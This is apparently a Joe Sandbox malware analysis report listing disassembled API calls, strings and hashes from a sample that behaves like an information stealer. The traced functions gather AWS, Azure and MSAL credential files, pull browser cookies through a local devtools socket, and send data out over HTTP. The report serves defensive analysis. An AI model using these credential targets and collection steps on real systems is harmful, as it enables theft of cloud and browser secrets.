GetProcAddress.KERNEL32(006D72EC,006D6D94), ref: 0240A114
GetProcAddress.KERNEL32(006D71B0,006D6B28), ref: 0240A135
GetProcAddress.KERNEL32(006D71E0,006D6E14), ref: 0240A156
GetProcAddress.KERNEL32(006D71E0,0042072C), ref: 0240A16D

Memory Dump Source

Source File: 00000000.00000002.1921333009.00000000023F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 023F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_23f0000_8WOUWb5iEv.jbxd

Yara matches

Similarity

API ID: AddressProc$LibraryLoad
String ID:
API String ID: 2238633743-0
Opcode ID: edf66d35e3c25c46ff42be0291b8a279c2bd212ca972e11257e66bc224b5ba57
Instruction ID: bdbb32ffe0ed2911dcdaaf73fe8acaaa910b9f61b8d7eb0ba894d4ccaf9fcd00
Opcode Fuzzy Hash: edf66d35e3c25c46ff42be0291b8a279c2bd212ca972e11257e66bc224b5ba57
Instruction Fuzzy Hash: DDA16EB5D0A2549FC344DFA8FC889567BBBA78D301708A61BF909C3674E734A640CF62

Function 02400617 Relevance: 48.4, APIs: 32, Instructions: 363stringmemoryCOMMON

Download Yara Rule

APIs

Part of subcall function 0240ACB7: lstrcpy.KERNEL32(00420E1A,00000000), ref: 0240ACFF

Part of subcall function 024091D7: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 02409202

Part of subcall function 0240AE97: lstrcpy.KERNEL32(00000000,?), ref: 0240AEE9
Part of subcall function 0240AE97: lstrcat.KERNEL32(00000000), ref: 0240AEF9

Part of subcall function 0240AE17: lstrcpy.KERNEL32(?,00420E1A), ref: 0240AE7C

Part of subcall function 0240AF27: lstrlen.KERNEL32(?,006D6BF0,?,004250E4,00420E1A), ref: 0240AF3C
Part of subcall function 0240AF27: lstrcpy.KERNEL32(00000000), ref: 0240AF7B
Part of subcall function 0240AF27: lstrcat.KERNEL32(00000000,00000000), ref: 0240AF89

Part of subcall function 0240AD17: lstrcpy.KERNEL32(?,00000000), ref: 0240AD5D

Part of subcall function 023FA377: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 023FA3A3
Part of subcall function 023FA377: GetFileSizeEx.KERNEL32(000000FF,?), ref: 023FA3C8
Part of subcall function 023FA377: LocalAlloc.KERNEL32(00000040,?), ref: 023FA3E8
Part of subcall function 023FA377: ReadFile.KERNEL32(000000FF,?,00000000,023F16F6,00000000), ref: 023FA411
Part of subcall function 023FA377: LocalFree.KERNEL32(023F16F6), ref: 023FA447
Part of subcall function 023FA377: CloseHandle.KERNEL32(000000FF), ref: 023FA451

Part of subcall function 02409227: LocalAlloc.KERNEL32(00000040,-00000001), ref: 02409249

strtok_s.MSVCRT ref: 024006E2
GetProcessHeap.KERNEL32(00000000,000F423F,00420DBF,00420DBE,00420DBB,00420DBA), ref: 02400729
RtlAllocateHeap.NTDLL(00000000), ref: 02400730
StrStrA.SHLWAPI(00000000,00421710), ref: 0240074C
lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB7), ref: 0240075A

Part of subcall function 02408CD7: malloc.MSVCRT ref: 02408CDF
Part of subcall function 02408CD7: strncpy.MSVCRT ref: 02408CFA

StrStrA.SHLWAPI(00000000,00421718), ref: 02400796
lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB7), ref: 024007A4
StrStrA.SHLWAPI(00000000,00421720), ref: 024007E0
lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB7), ref: 024007EE
StrStrA.SHLWAPI(00000000,00421728), ref: 0240082A
lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB7), ref: 0240083C
lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB7), ref: 024008C9
lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB7), ref: 024008E1
lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB7), ref: 024008F9
lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB7), ref: 02400911
lstrcat.KERNEL32(?,00421744), ref: 02400929
lstrcat.KERNEL32(?,00421758), ref: 02400938
lstrcat.KERNEL32(?,00421768), ref: 02400947
lstrcat.KERNEL32(?,00000000), ref: 0240095A
lstrcat.KERNEL32(?,00421770), ref: 02400969
lstrcat.KERNEL32(?,00000000), ref: 0240097C
lstrcat.KERNEL32(?,00421774), ref: 0240098B
lstrcat.KERNEL32(?,00421778), ref: 0240099A
lstrcat.KERNEL32(?,00000000), ref: 024009AD
lstrcat.KERNEL32(?,00421780), ref: 024009BC
lstrcat.KERNEL32(?,00421784), ref: 024009CB
lstrcat.KERNEL32(?,00000000), ref: 024009DE
lstrcat.KERNEL32(?,00421790), ref: 024009ED
lstrcat.KERNEL32(?,00421794), ref: 024009FC
strtok_s.MSVCRT ref: 02400A40
lstrlen.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB7), ref: 02400A55
memset.MSVCRT ref: 02400AA4

Memory Dump Source

Source File: 00000000.00000002.1921333009.00000000023F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 023F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_23f0000_8WOUWb5iEv.jbxd

Yara matches

Similarity

API ID: lstrcat$lstrlen$lstrcpy$FileLocal$AllocHeapstrtok_s$AllocateCloseCreateFolderFreeHandlePathProcessReadSizemallocmemsetstrncpy
String ID:
API String ID: 3689735781-0
Opcode ID: 098dc5743905a2ee9813f64f0b56af725ff5a500f78c5c8fd9e9f659a4e17eb6
Instruction ID: d4124e34b7e7b85632e63de3a35f51b1f983f7a4ada4afe80eb27c4b0441a709
Opcode Fuzzy Hash: 098dc5743905a2ee9813f64f0b56af725ff5a500f78c5c8fd9e9f659a4e17eb6
Instruction Fuzzy Hash: 41D13171D01218ABCB04EBF1DD95EEE773AAF54701F50456EE206A60D0EF34AA88CF65

Function 004059B0 Relevance: 46.0, APIs: 19, Strings: 7, Instructions: 493networkstringmemoryCOMMON

Download Yara Rule

APIs

Part of subcall function 0041AAB0: lstrcpy.KERNEL32(?,00000000), ref: 0041AAF6

Part of subcall function 00404800: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 0040483A
Part of subcall function 00404800: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404851
Part of subcall function 00404800: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404868
Part of subcall function 00404800: lstrlenA.KERNEL32(00000000,00000000,0000003C), ref: 00404889
Part of subcall function 00404800: InternetCrackUrlA.WININET(00000000,00000000), ref: 00404899

Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98

InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00405A48
StrCmpCA.SHLWAPI(?,00A72600), ref: 00405A63
InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00405BE3
lstrlenA.KERNEL32(00000000,00000000,?,00000000,00000000,?,",00000000,?,00A72610,00000000,?,00A693A0,00000000,?,00421B4C), ref: 00405EC1
lstrlenA.KERNEL32(00000000), ref: 00405ED2
GetProcessHeap.KERNEL32(00000000,?), ref: 00405EE3
HeapAlloc.KERNEL32(00000000), ref: 00405EEA
lstrlenA.KERNEL32(00000000), ref: 00405EFF
memcpy.MSVCRT(?,00000000,00000000), ref: 00405F16
lstrlenA.KERNEL32(00000000), ref: 00405F28
lstrlenA.KERNEL32(00000000,00000000,00000000), ref: 00405F41
memcpy.MSVCRT(?), ref: 00405F4E
lstrlenA.KERNEL32(00000000,?,?), ref: 00405F6B
HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00405F7F
InternetReadFile.WININET(00000000,?,000000C7,?), ref: 00405F9C
InternetCloseHandle.WININET(00000000), ref: 00406000
InternetCloseHandle.WININET(00000000), ref: 0040600D
HttpOpenRequestA.WININET(00000000,00A72650,?,00A72080,00000000,00000000,00400100,00000000), ref: 00405C48

Part of subcall function 0041ACC0: lstrlenA.KERNEL32(?,004210F8,?,00000000,00420AF3), ref: 0041ACD5
Part of subcall function 0041ACC0: lstrcpy.KERNEL32(00000000), ref: 0041AD14
Part of subcall function 0041ACC0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AD22

Part of subcall function 0041ABB0: lstrcpy.KERNEL32(?,00420AF3), ref: 0041AC15

Part of subcall function 0041AC30: lstrcpy.KERNEL32(00000000,?), ref: 0041AC82
Part of subcall function 0041AC30: lstrcatA.KERNEL32(00000000), ref: 0041AC92

InternetCloseHandle.WININET(00000000), ref: 00406017

Strings

S`A, xrefs: 00405A0F, 004060B7, 00405A97, 00405AA0, 00405B0E, 00405B85, 00405C83, 00405DC4, 00405B11, 00405B88, 00405C86, 00405DC7
------, xrefs: 00405C5B
", xrefs: 00405E66
S`A, xrefs: 004060CA
", xrefs: 00405D25
------, xrefs: 00405D9C
------, xrefs: 00405AE6

Memory Dump Source

Source File: 00000000.00000002.1920616957.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1920616957.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1920616957.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1920616957.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1920616957.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1920616957.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_8WOUWb5iEv.jbxd

Yara matches

Similarity

API ID: lstrlen$Internet$lstrcpy$??2@CloseHandle$HeapHttpOpenRequestlstrcatmemcpy$AllocConnectCrackFileProcessReadSend
String ID: "$"$------$------$------$S`A$S`A
API String ID: 1406981993-1449208648
Opcode ID: 98ea913884f64a500b12d84de6c339a9ec993a8037e53d87be3eb2d39ddf946f
Instruction ID: 528bda5bfb4e43d7cafc1c43cb8ffcda3f2e6465d8e228b0a039cdd5195e34d5
Opcode Fuzzy Hash: 98ea913884f64a500b12d84de6c339a9ec993a8037e53d87be3eb2d39ddf946f
Instruction Fuzzy Hash: 1412FC71925128ABCB14EBA1DCA5FEEB379BF14714F00419EF10662091EF783B98CB59

Function 00414FC0 Relevance: 33.4, APIs: 10, Strings: 9, Instructions: 119stringCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00414FD7

Part of subcall function 00418F70: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 00418F9B

lstrcatA.KERNEL32(?,00000000), ref: 00415000
lstrcatA.KERNEL32(?,\.azure\), ref: 0041501D

Part of subcall function 00414B60: wsprintfA.USER32 ref: 00414B7C
Part of subcall function 00414B60: FindFirstFileA.KERNEL32(?,?), ref: 00414B93

memset.MSVCRT ref: 00415063
lstrcatA.KERNEL32(?,00000000), ref: 0041508C
lstrcatA.KERNEL32(?,\.aws\), ref: 004150A9

Part of subcall function 00414B60: StrCmpCA.SHLWAPI(?,00420FC4), ref: 00414BC1
Part of subcall function 00414B60: StrCmpCA.SHLWAPI(?,00420FC8), ref: 00414BD7
Part of subcall function 00414B60: FindNextFileA.KERNEL32(000000FF,?), ref: 00414DCD
Part of subcall function 00414B60: FindClose.KERNEL32(000000FF), ref: 00414DE2

memset.MSVCRT ref: 004150EF
lstrcatA.KERNEL32(?,00000000), ref: 00415118
lstrcatA.KERNEL32(?,\.IdentityService\), ref: 00415135

Part of subcall function 00414B60: wsprintfA.USER32 ref: 00414C00
Part of subcall function 00414B60: StrCmpCA.SHLWAPI(?,004208D3), ref: 00414C15
Part of subcall function 00414B60: wsprintfA.USER32 ref: 00414C32
Part of subcall function 00414B60: PathMatchSpecA.SHLWAPI(?,?), ref: 00414C6E
Part of subcall function 00414B60: lstrcatA.KERNEL32(?,00A6DEE0,?,000003E8), ref: 00414C9A
Part of subcall function 00414B60: lstrcatA.KERNEL32(?,00420FE0), ref: 00414CAC
Part of subcall function 00414B60: lstrcatA.KERNEL32(?,?), ref: 00414CC0
Part of subcall function 00414B60: lstrcatA.KERNEL32(?,00420FE4), ref: 00414CD2
Part of subcall function 00414B60: lstrcatA.KERNEL32(?,?), ref: 00414CE6
Part of subcall function 00414B60: CopyFileA.KERNEL32(?,?,00000001), ref: 00414CFC
Part of subcall function 00414B60: DeleteFileA.KERNEL32(?), ref: 00414D81

memset.MSVCRT ref: 0041517B

Strings

Azure\.aws, xrefs: 004150AF
*.*, xrefs: 00415028
\.IdentityService\, xrefs: 00415129
Azure\.azure, xrefs: 00415023
msal.cache, xrefs: 00415140
\.azure\, xrefs: 00415011
Azure\.IdentityService, xrefs: 0041513B
\.aws\, xrefs: 0041509D
*.*, xrefs: 004150B4

Memory Dump Source

Source File: 00000000.00000002.1920616957.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1920616957.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1920616957.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1920616957.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1920616957.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1920616957.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_8WOUWb5iEv.jbxd

Yara matches

Similarity

API ID: lstrcat$Filememset$Findwsprintf$Path$CloseCopyDeleteFirstFolderMatchNextSpec
String ID: *.*$*.*$Azure\.IdentityService$Azure\.aws$Azure\.azure$\.IdentityService\$\.aws\$\.azure\$msal.cache
API String ID: 4017274736-974132213
Opcode ID: cd85f6f5a5e2b7ce53f17e9595acec7f298040401d7087830733eddf1b0d25f2
Instruction ID: 39229561bcf9e6d20be1630849a4938ad9d2aa6361ec20f439e2b4dca26d7b75
Opcode Fuzzy Hash: cd85f6f5a5e2b7ce53f17e9595acec7f298040401d7087830733eddf1b0d25f2
Instruction Fuzzy Hash: 3F41D6B5E4021867DB10F770EC4BFDD33385B60705F40485AB649660D2FEB8A7D88B9A

Function 0040CFF0 Relevance: 31.9, APIs: 21, Instructions: 374stringmemoryfileCOMMON

Download Yara Rule

APIs

Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98

Part of subcall function 0041ACC0: lstrlenA.KERNEL32(?,004210F8,?,00000000,00420AF3), ref: 0041ACD5
Part of subcall function 0041ACC0: lstrcpy.KERNEL32(00000000), ref: 0041AD14
Part of subcall function 0041ACC0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AD22

Part of subcall function 0041ABB0: lstrcpy.KERNEL32(?,00420AF3), ref: 0041AC15

Part of subcall function 00418CF0: GetSystemTime.KERNEL32(?,00A69400,004205B6,?,?,?,?,?,?,?,?,?,004049B3,?,00000014), ref: 00418D16

Part of subcall function 0041AC30: lstrcpy.KERNEL32(00000000,?), ref: 0041AC82
Part of subcall function 0041AC30: lstrcatA.KERNEL32(00000000), ref: 0041AC92

CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0040D083
GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 0040D1C7
HeapAlloc.KERNEL32(00000000), ref: 0040D1CE
lstrcatA.KERNEL32(?,00000000,00A6DCB0,0042156C,00A6DCB0,00421568,00000000), ref: 0040D308
lstrcatA.KERNEL32(?,00421570), ref: 0040D317
lstrcatA.KERNEL32(?,00000000), ref: 0040D32A
lstrcatA.KERNEL32(?,00421574), ref: 0040D339
lstrcatA.KERNEL32(?,00000000), ref: 0040D34C
lstrcatA.KERNEL32(?,00421578), ref: 0040D35B
lstrcatA.KERNEL32(?,00000000), ref: 0040D36E
lstrcatA.KERNEL32(?,0042157C), ref: 0040D37D
lstrcatA.KERNEL32(?,00000000), ref: 0040D390
lstrcatA.KERNEL32(?,00421580), ref: 0040D39F
lstrcatA.KERNEL32(?,00000000), ref: 0040D3B2
lstrcatA.KERNEL32(?,00421584), ref: 0040D3C1
lstrcatA.KERNEL32(?,00000000), ref: 0040D3D4
lstrcatA.KERNEL32(?,00421588), ref: 0040D3E3

Part of subcall function 0041AB30: lstrlenA.KERNEL32(00000000,?,?,00415DA4,00420ADF,00420ADB,?,?,00416DB6,00000000,?,00A6DD90,?,004210F4,?,00000000), ref: 0041AB3B
Part of subcall function 0041AB30: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AB95

lstrlenA.KERNEL32(?), ref: 0040D42A
lstrlenA.KERNEL32(?), ref: 0040D439
memset.MSVCRT ref: 0040D488

Part of subcall function 0041AD80: StrCmpCA.SHLWAPI(00000000,00421568,0040D2A2,00421568,00000000), ref: 0041AD9F

DeleteFileA.KERNEL32(00000000), ref: 0040D4B4

Memory Dump Source

Source File: 00000000.00000002.1920616957.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1920616957.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1920616957.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1920616957.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1920616957.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1920616957.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_8WOUWb5iEv.jbxd

Yara matches

Similarity

API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocCopyDeleteProcessSystemTimememset
String ID:
API String ID: 2775534915-0
Opcode ID: 354d224c4b0f3cfcf3718d24f287e44c077c4f9b3b18ea9b6768966a1a3a1af4
Instruction ID: 090733d9ad632ec07999f14fc915118f0ed2ae89bdc12e1fab3d18f5c5045e08
Opcode Fuzzy Hash: 354d224c4b0f3cfcf3718d24f287e44c077c4f9b3b18ea9b6768966a1a3a1af4
Instruction Fuzzy Hash: 35E17571E15114ABCB04EBA1ED56EEE7339AF14305F10415EF106760A1EF38BB98CB6A

Function 023FD257 Relevance: 31.9, APIs: 21, Instructions: 374stringmemoryfileCOMMON

Download Yara Rule

APIs

Part of subcall function 0240ACB7: lstrcpy.KERNEL32(00420E1A,00000000), ref: 0240ACFF

Part of subcall function 0240AF27: lstrlen.KERNEL32(?,006D6BF0,?,004250E4,00420E1A), ref: 0240AF3C
Part of subcall function 0240AF27: lstrcpy.KERNEL32(00000000), ref: 0240AF7B
Part of subcall function 0240AF27: lstrcat.KERNEL32(00000000,00000000), ref: 0240AF89

Part of subcall function 0240AE17: lstrcpy.KERNEL32(?,00420E1A), ref: 0240AE7C

Part of subcall function 02408F57: GetSystemTime.KERNEL32(00420E1B,006D6CA4,004205B6,?,?,023F1660,?,0000001A,00420E1B,00000000,?,006D6BF0,?,004250E4,00420E1A), ref: 02408F7D

Part of subcall function 0240AE97: lstrcpy.KERNEL32(00000000,?), ref: 0240AEE9
Part of subcall function 0240AE97: lstrcat.KERNEL32(00000000), ref: 0240AEF9

CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 023FD2EA
GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 023FD42E
RtlAllocateHeap.NTDLL(00000000), ref: 023FD435
lstrcat.KERNEL32(?,00000000), ref: 023FD56F
lstrcat.KERNEL32(?,00421570), ref: 023FD57E
lstrcat.KERNEL32(?,00000000), ref: 023FD591
lstrcat.KERNEL32(?,00421574), ref: 023FD5A0
lstrcat.KERNEL32(?,00000000), ref: 023FD5B3
lstrcat.KERNEL32(?,00421578), ref: 023FD5C2
lstrcat.KERNEL32(?,00000000), ref: 023FD5D5
lstrcat.KERNEL32(?,0042157C), ref: 023FD5E4
lstrcat.KERNEL32(?,00000000), ref: 023FD5F7
lstrcat.KERNEL32(?,00421580), ref: 023FD606
lstrcat.KERNEL32(?,00000000), ref: 023FD619
lstrcat.KERNEL32(?,00421584), ref: 023FD628
lstrcat.KERNEL32(?,00000000), ref: 023FD63B
lstrcat.KERNEL32(?,00421588), ref: 023FD64A

Part of subcall function 0240AD97: lstrlen.KERNEL32(023F51BC,?,?,023F51BC,00420DDF), ref: 0240ADA2
Part of subcall function 0240AD97: lstrcpy.KERNEL32(00420DDF,00000000), ref: 0240ADFC

lstrlen.KERNEL32(?), ref: 023FD691
lstrlen.KERNEL32(?), ref: 023FD6A0
memset.MSVCRT ref: 023FD6EF

Part of subcall function 0240AFE7: StrCmpCA.SHLWAPI(00000000,00421568,023FD509,00421568,00000000), ref: 0240B006

DeleteFileA.KERNEL32(00000000), ref: 023FD71B

Memory Dump Source

Source File: 00000000.00000002.1921333009.00000000023F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 023F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_23f0000_8WOUWb5iEv.jbxd

Yara matches

Similarity

API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocateCopyDeleteProcessSystemTimememset
String ID:
API String ID: 1973479514-0
Opcode ID: 61858acd6518aa59b0545b41e6e8699b4742c055ec598c9622ee146424d88619
Instruction ID: 68ab899c8c951d08f22875c4f83963e5a65a02c0585b7a9131138c12c4566ae5
Opcode Fuzzy Hash: 61858acd6518aa59b0545b41e6e8699b4742c055ec598c9622ee146424d88619
Instruction Fuzzy Hash: 7DE11271D10218ABCB04EBA1DD95DEE733AAF54301F50456EF606A60E0EF35AE88CF61

Function 00409BE0 Relevance: 31.6, APIs: 13, Strings: 5, Instructions: 141stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00409A50: InternetOpenA.WININET(00420AF6,00000001,00000000,00000000,00000000), ref: 00409A6A

memset.MSVCRT ref: 00409C33
lstrcatA.KERNEL32(?,ws://localhost:9229), ref: 00409C48
lstrcatA.KERNEL32(?,00000000), ref: 00409C5E
memset.MSVCRT ref: 00409C9A
lstrcatA.KERNEL32(?,cookies), ref: 00409CAF
lstrcatA.KERNEL32(?,004212C4), ref: 00409CC1
lstrcatA.KERNEL32(?,?), ref: 00409CD5
lstrcatA.KERNEL32(?,004212C8), ref: 00409CE7
lstrcatA.KERNEL32(?,?), ref: 00409CFB
lstrcatA.KERNEL32(?,.txt), ref: 00409D0D
lstrlenA.KERNEL32(00000000), ref: 00409D17
lstrlenA.KERNEL32(00000000), ref: 00409D26

Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98

memset.MSVCRT ref: 00409D7E

Strings

/devtools, xrefs: 00409C0B
cookies, xrefs: 00409CA3
.txt, xrefs: 00409D01
localhost, xrefs: 00409BF5
ws://localhost:9229, xrefs: 00409C3C

Memory Dump Source

Source File: 00000000.00000002.1920616957.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1920616957.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1920616957.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1920616957.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1920616957.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1920616957.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_8WOUWb5iEv.jbxd

Yara matches

Similarity

API ID: lstrcat$memset$lstrlen$InternetOpenlstrcpy
String ID: .txt$/devtools$cookies$localhost$ws://localhost:9229
API String ID: 689835475-3542011879
Opcode ID: 736881a50dba6b8905840eac4370110c5d051842a78476ee018cd8b30cadbd96
Instruction ID: dd0e0b2e904cac6dcb4644251d8498bdcd69e700431b121c7f08c254ac6fdba9
Opcode Fuzzy Hash: 736881a50dba6b8905840eac4370110c5d051842a78476ee018cd8b30cadbd96
Instruction Fuzzy Hash: 97517E71D10518ABCB14EBE0EC55FEE7738AF14306F40456AF106A70D1EB78AA48CF69

Function 023F5C17 Relevance: 29.0, APIs: 19, Instructions: 493networkstringmemoryCOMMON

Download Yara Rule

APIs

Part of subcall function 0240AD17: lstrcpy.KERNEL32(?,00000000), ref: 0240AD5D

Part of subcall function 023F4A67: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 023F4AA1
Part of subcall function 023F4A67: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 023F4AB8
Part of subcall function 023F4A67: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 023F4ACF
Part of subcall function 023F4A67: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 023F4AF0
Part of subcall function 023F4A67: InternetCrackUrlA.WININET(00000000,00000000), ref: 023F4B00

Part of subcall function 0240ACB7: lstrcpy.KERNEL32(00420E1A,00000000), ref: 0240ACFF

InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 023F5CAF
StrCmpCA.SHLWAPI(?,006D6E80), ref: 023F5CCA
InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 023F5E4A
lstrlen.KERNEL32(00000000,00000000,?,00000000,00000000,?,00421B50,00000000,?,006D6AF0,00000000,?,006D6CF0,00000000,?,00421B4C), ref: 023F6128
lstrlen.KERNEL32(00000000), ref: 023F6139
GetProcessHeap.KERNEL32(00000000,?), ref: 023F614A
RtlAllocateHeap.NTDLL(00000000), ref: 023F6151
lstrlen.KERNEL32(00000000), ref: 023F6166
memcpy.MSVCRT(?,00000000,00000000), ref: 023F617D
lstrlen.KERNEL32(00000000), ref: 023F618F
lstrlen.KERNEL32(00000000,00000000,00000000), ref: 023F61A8
memcpy.MSVCRT(?), ref: 023F61B5
lstrlen.KERNEL32(00000000,?,?), ref: 023F61D2
HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 023F61E6
InternetReadFile.WININET(00000000,?,000000C7,?), ref: 023F6203
InternetCloseHandle.WININET(00000000), ref: 023F6267
InternetCloseHandle.WININET(00000000), ref: 023F6274
HttpOpenRequestA.WININET(00000000,006D6E9C,?,006D6CB4,00000000,00000000,00400100,00000000), ref: 023F5EAF

Part of subcall function 0240AF27: lstrlen.KERNEL32(?,006D6BF0,?,004250E4,00420E1A), ref: 0240AF3C
Part of subcall function 0240AF27: lstrcpy.KERNEL32(00000000), ref: 0240AF7B
Part of subcall function 0240AF27: lstrcat.KERNEL32(00000000,00000000), ref: 0240AF89

Part of subcall function 0240AE17: lstrcpy.KERNEL32(?,00420E1A), ref: 0240AE7C

Part of subcall function 0240AE97: lstrcpy.KERNEL32(00000000,?), ref: 0240AEE9
Part of subcall function 0240AE97: lstrcat.KERNEL32(00000000), ref: 0240AEF9

InternetCloseHandle.WININET(00000000), ref: 023F627E

Memory Dump Source

Source File: 00000000.00000002.1921333009.00000000023F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 023F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_23f0000_8WOUWb5iEv.jbxd

Yara matches

Similarity

API ID: lstrlen$Internet$lstrcpy$??2@CloseHandle$HeapHttpOpenRequestlstrcatmemcpy$AllocateConnectCrackFileProcessReadSend
String ID:
API String ID: 1703137719-0
Opcode ID: 2a3c1412926e8dcb65fac1fead3eb2460a9c625ebd483e9c6d5746682fc61762
Instruction ID: 684484681605fba1bd2d882ca17cadbe3bf280bae558768242b9d2ab14ecab37
Opcode Fuzzy Hash: 2a3c1412926e8dcb65fac1fead3eb2460a9c625ebd483e9c6d5746682fc61762
Instruction Fuzzy Hash: EA12AF71951228ABCB15EBA1DCD4FEEB37ABF54701F5045AEE246620D0EF706A88CF50

Function 0040CA90 Relevance: 26.6, APIs: 14, Strings: 1, Instructions: 383filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98

Part of subcall function 0041AC30: lstrcpy.KERNEL32(00000000,?), ref: 0041AC82
Part of subcall function 0041AC30: lstrcatA.KERNEL32(00000000), ref: 0041AC92

Part of subcall function 0041ABB0: lstrcpy.KERNEL32(?,00420AF3), ref: 0041AC15

Part of subcall function 0041ACC0: lstrlenA.KERNEL32(?,004210F8,?,00000000,00420AF3), ref: 0041ACD5
Part of subcall function 0041ACC0: lstrcpy.KERNEL32(00000000), ref: 0041AD14
Part of subcall function 0041ACC0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AD22

CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,00A70D60,00000000,?,00421544,00000000,?,?), ref: 0040CB6C
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 0040CB89
GetFileSize.KERNEL32(00000000,00000000), ref: 0040CB95
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 0040CBA8
??_U@YAPAXI@Z.MSVCRT(-00000001), ref: 0040CBB5
ReadFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 0040CBD9
StrStrA.SHLWAPI(?,00A70EB0,00420B56), ref: 0040CBF7
StrStrA.SHLWAPI(00000000,00A70DA8), ref: 0040CC1E
